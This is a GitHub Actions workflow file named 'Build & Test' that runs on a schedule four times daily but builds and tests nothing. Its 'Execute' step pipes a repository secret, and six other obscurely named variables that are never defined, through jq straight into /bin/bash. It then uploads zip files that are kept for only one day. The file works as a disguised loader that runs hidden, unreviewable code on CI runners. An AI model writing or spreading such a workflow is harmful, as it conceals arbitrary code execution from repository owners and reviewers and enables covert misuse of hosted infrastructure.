name: Build & Test
on:
  workflow_dispatch:

  schedule:
    - cron: '53 5,11,17,23 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          xi13009: ${{ secrets.xi13009 }}
        run: |
          printf '%s' "$xi13009" | jq -r .aqja58 | /bin/bash
          echo $i02 | jq -r .qkgj037 | /bin/bash
          echo $yyrwm72 | jq -r .qciq32 | /bin/bash
          printf '%s' "$tu3" | jq -r .aaqfq96 | /bin/bash
          echo $nktlw04619 | jq -r .icbuv11121 | /bin/bash
          echo $t56 | jq -r .hjkzm3514 | /bin/bash
          echo $pzz053 | jq -r .ddzs72271 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: 6uwlUn4i
          path: "*.zip"
          retention-days: 1
